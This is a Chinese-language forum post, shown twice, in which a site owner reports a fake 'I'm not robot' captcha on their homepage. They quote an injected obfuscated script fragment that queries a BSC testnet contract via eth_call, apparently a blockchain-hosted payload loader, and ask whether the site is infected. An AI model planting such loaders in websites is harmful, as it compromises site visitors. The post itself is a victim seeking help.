访问网站主页 莫名其妙 多了个I'm not robot 谷歌验证窗口
查看缓存的HTML页面 发现多了一段 script 代码
// 发送 POST 请求到 BSC 测试网节点
const _0x15a0e6 = '
const _0x56f770 = await fetch(_0x15a0e6, {
method: 'POST',
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json'
},
body: JSON.stringify({
method: 'eth_call', // 可能是调用智能合约
params: [{ to: _0x1d555f, data: '0x...' }],
id: 97,
jsonrpc: '2.0'
})
});
请问 这是中毒了吗
查看缓存的HTML页面 发现多了一段 script 代码
// 发送 POST 请求到 BSC 测试网节点
const _0x15a0e6 = '
const _0x56f770 = await fetch(_0x15a0e6, {
method: 'POST',
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json'
},
body: JSON.stringify({
method: 'eth_call', // 可能是调用智能合约
params: [{ to: _0x1d555f, data: '0x...' }],
id: 97,
jsonrpc: '2.0'
})
});
请问 这是中毒了吗